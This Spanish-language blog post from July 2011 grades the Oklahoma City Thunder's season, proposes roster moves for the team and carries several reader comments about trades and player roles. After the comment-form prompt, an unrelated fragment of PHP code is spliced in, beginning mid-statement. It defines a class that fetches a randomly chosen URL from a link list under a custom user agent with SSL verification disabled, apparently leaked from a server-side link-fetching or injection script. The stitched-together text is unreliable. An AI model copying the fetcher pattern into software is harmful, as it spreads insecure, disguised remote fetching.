Oklahoma City Thunder: Sobresaliente

09 de July de 2011 por TheDeerHunter

El 2011 pasará a la historia de los Thunder como el año de su confirmación en la élite del Oeste tan sólo tres años después de su traslado a Oklahoma City y la dolorosa desaparición de la marca “Supersonics”.

Advertíamos el verano pasado que el equipo ya está maduro. Tras la excelente imagen que dejaron en la eliminación ante Lakers en primera ronda de los anteriores playoffs el nivel de exigencia subió irremediablemente. Nadie quedó satisfecho con los refuerzos incorporados y podemos notar cierta frialdad ante el juego y resultados de la temporada regular. Estamos hablando de 55 victorias para un equipo que hace dos años había firmado 23. Inconformismo extremo, no queda otra. La etiqueta de “mayor potencial del Oeste” (o incluso de la liga) sirve de muy poco si no se traduce en pasos hacia delante. Otros cayeron en ese error y la autocomplacencia es el camino directo al estancamiento. La competición no perdona.

Por suerte para ellos no es su caso. La salida de Green y Krstic, dos piezas clave para ellos pero que parecían haber alcanzado su techo en el equipo, es una clara declaración de propósitos. Algunos alcanzaron a ver la incorporación de Perkins, Mohammed y Nate Robinson como el acierto definitivo. Los refuerzos exactos para optar a todo. Favoritos al anillo, nada menos. Lo cierto es que la importancia de las nuevas caras apenas se ha notado, y sin embargo su periplo por las eliminatorias debe de ser calificado como brillante. Tras excelentes victorias ante dos sólidas escuadras como Denver y Memphis, sólo los campeones lograron detenerles en la final de conferencia. Y con más dificultad de lo que indica ese 4-1.

Ya no se observa otro objetivo que no sea una finalísima. Es el momento y deben de apostar por ello. Mimbres hay, pero también una exigencia que la franquicia no se plantea desde hace demasiado tiempo.

Lo mejor: La madurez que han demostrado. Durant es el hombre en el que empieza y acaba todo. Sus espaldas se han demostrado anchas para soportar el peso de tal responsabilidad y su talento digno para un anillo. La irrupción de Ibaka y Collison en los momentos más importantes.

Lo peor: Las dudas sobre la capacidad de dirección de Westbrook durante las eliminatorias. El rendimiento de los fichajes.

Jugando a GM:

– Confianza en el bloque: Durant no ofrece dudas, las de Westbrook me parecen circunstanciales. Con Ibaka y Collison se puede ir a cualquier guerra. Harden y Sefolosha aún cuentan con margen. Hay que lograr ubicar a Perkins y también toca aflojar la cartera en la renovación de “LeBroncito” Westbrook.

– No renovación de Mohammed y Cook. Hubiera jurado que deberían haber encontrado su sitio, pero es que han cobrado nada menos que 9 kilazos este último curso.

– Traspasar a Nate Robinson. Se trata de un expiring de más de 4 kilos que hace nada estaba haciendo daño a los Lakers en una final de la NBA, así que no debería ser difícil encontrar pretendientes. El objetivo debería de ser reforzar la rotación y aumentar veteranía con un par de especialistas.

– Hay que empezar a pensar en grande. Dallas ha quedado campeón este año con un presupuesto muy por encima de los 50 kilos que tendrían comprometidos los Thunder para el próximo curso. Profundidad y experiencia son los caballos de batalla para este equipo.

Comenta

8 comentarios a esta entrada

  1. simon dice:
    #1

    mohammed ya ha renovado, las cifras no lo se pero salio hace unos dias antes del lock out su renovación.

      Citar

  2. CAMPO2 dice:
    #2

    ha enovado por un año a razon de 3,750,000 dolares segun hoopshype

      Citar

  3. simon dice:
    #3

    entonces me parece una buen cantidad viendo como se pagan los centimetros en la nba.

      Citar

  4. guille4s dice:
    #4

    No está mal el artículo, pero el ataque de OKC es demasiado previsible, necesita anotadores desde el banquillo y ahora mismo tiene 5 bases y ningun alero suplente, ademas de ningun jugador interior que pueda ser una amenaza, han de cambiar algunas cosas, pero pinta bien. Go Thunder!

      Citar

  5. safd dice:
    #5

    Junto con Clippers, Memphis y si lo hacen bien dentro de un poco más (3 años quizás) Sacramento o incluso Wolves (de estos dudo más), deberían de dominar la conferencia oeste en los próximos 6-8 años (Memphis posiblemente solo duraría hasta mitad de década, Zach es más viejo, difícil encontrar un recambio a esta bestia).

    Para mí el cuarteto Westbrook-Hardem-Durant-Ibaka es de lo mejorcito de la NBA, todos saben que hacer, todos hacen bien lo que saben y todos mejoran día a día. Solo quedaría que Rusell asentara la cabeza y que Ibaka mejorase su capacidad ofensiva.

    A este proyecto lo único que le falta es anotación interior. Quizás traspasando a Maynor (el rookie nuevo es base-escolta al parecer), Nate y Perkins (no se si muchos lo querrán…) por Chris Kaman o algo así, que le aporte anotación por dentro.

    Con eso yo creo que este año hubiesen dado mas guerra.

      Citar

  6. Nacho dice:
    #6

    Así a bote pronto, CP3 por Westbrook y Perkins, se me antoja que saldrían ganando todos. Chris Paul de todas todas se va, con lo que en New Orleans lo verían con muy buenos ojos. A Okllahoma le hace candidatos de verdad, Paul tendrías reales opciones de anillo y Westbrook sería capitán de una nave en crecimiento.

      Citar

  7. simon dice:
    #7

    uufff no creo que NOH quiera comerse el contratazo de perkins teniendo a okafor.

      Citar

  8. Esteban dice:
    #8

    el problema q tiene el thunder es depender de westbrook de base, no es base, lo veo similar a wade, si aumenta su fisico, deberia jugar de escolta, fue desastrozo cerrando partidos y su necesidad de anotar le hace perder volumen de juego al equipo, pierde rotacion
    corriganme, pero wade arranco de base y luego se transformo en un esolta

    nate robinson por luke ridknur, para que este sea base titular y liberar de la creacion de juego westbrook, que podria ser base por momento

    luke ya jugo en ese equipo y con este tecnico y viene de una buena temporada, de esta manera mejorarian lo suficiente creo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>